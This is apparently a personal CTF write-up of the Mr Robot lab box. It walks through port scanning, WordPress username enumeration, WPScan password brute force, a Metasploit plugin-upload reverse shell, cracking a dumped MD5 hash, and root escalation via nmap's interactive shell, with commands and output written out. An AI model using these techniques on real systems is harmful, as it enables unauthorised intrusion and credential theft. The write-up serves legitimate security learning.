____ ___ _____ __ ____ ___ \ \/ // ____\____ ___ _______ _/ |______ \ \/ / \ /\ __\\__ \\ \/ /\__ \\ __\__ \ \ / / \ | | / __ \\ / / __ \| | / __ \_/ \ /___/\ \|__| (____ /\_/ (____ /__| (____ /___/\ \ \_/ \/ \/ \/ \_/
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
Mr Robot CTF is available as either a vulnhub download VM or as a room on TryHackMe. I initially attacked this box while in chat with some friends but I am going through it again on TryHackMe for the purpose of this write up. I won't be putting the keys in this write up. If you'd like to know the keys, following along and do the box for yourself!
I first deployed the box and was given the address 10.10.41.78. We will do a simple nmap scan to find open ports.
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
We can see a web server is running on the box. It's a pretty cool Mr Robot site they've built, but there is nothing of interest to us on the actual site. We can do a quick dirsearch to see if we find anything interesting.
Two interesting things pop out pretty quickly: robots.txt and wp-login.php
User-agent: *
fsocity.dic
key-1-of-3.txt
So we've found our first key, and a dictionary file of passwords. Time to brute force that wordpress login.
We can go to the wordpress login page and try a couple obvious user names to see if anything is a match. Admin, mrrobot, etc. Most names will
give you the following error: ERROR: Invalid username. Lost your password?
, but after trying the username 'elliot' you'll be greeted
with the following message: ERROR: The password you entered for the username elliot is incorrect. Lost your password?
This verifies that elliot is a valid username, and most likely the one we are looking to break. We can run sort
and uniq
on the password
file to remove any duplicates, which takes it from over 800,000 entires down to around 11,000.
sort fsocity.dic | uniq > newfs.dic
We can now use WPScan to brute force the password, with the following command
wpscan --url http://10.10.41.78/ -U elliot -P ./newfs.dic
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
Progress Time: 00:00:00 <==============================================> (0 / 0) 100.0% Time: 00:00:00
[SUCCESS] - elliot / ER28-0652
All Found
We can now use metasploit to upload a reverse shell via a wordpress plugin using unix/webapp/wp_admin_shell_upload.
set RHOST 10.10.41.78
set PASSWORD ER28-0652
set USERNAME elliot
[*] Started reverse TCP handler on 10.0.2.15:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
After stumbling with this a few times, a friend showed me a page discussing the same error and a possible solution. Setting WPCHECK to false will bypass verifying if it is a valid wordpress install.
Once into our meterpreter session, we can go to the home directory and find robot user directory. There we will find the following files.
100400/r-------- 33 fil 2015-11-13 07:28:21 +0000 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 07:28:21 +0000 password.raw-md5
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
After cracking the password we can upgrade to the robot user using su.
su -l robot
su: must be run from a terminal
This is a common problem you might run into with meterpreter. We can upgrade our terminal using this simple python one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'
$ su -l robot
We can now read key-2-of-3.txt and proceed to privesc for the third key. A quick check will show that an older version of nmap is installed on the system, and nmap runs with root privileges. We can start this version of nmap in an interactive shell, and then drop out to a root shell from there.
$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h for help
nmap> !sh
!sh
#
We can now go to the root directory, where we will find key-3-of-3.txt and finish the box.
Overall this box was a lot of fun, and I learned a lot about using WPScan and solving difficulties with Metasploit exploits not working as expected. I also transitioned from Parrot back to Kali, as I've encountered numerous issues with things not working correctly in Parrot.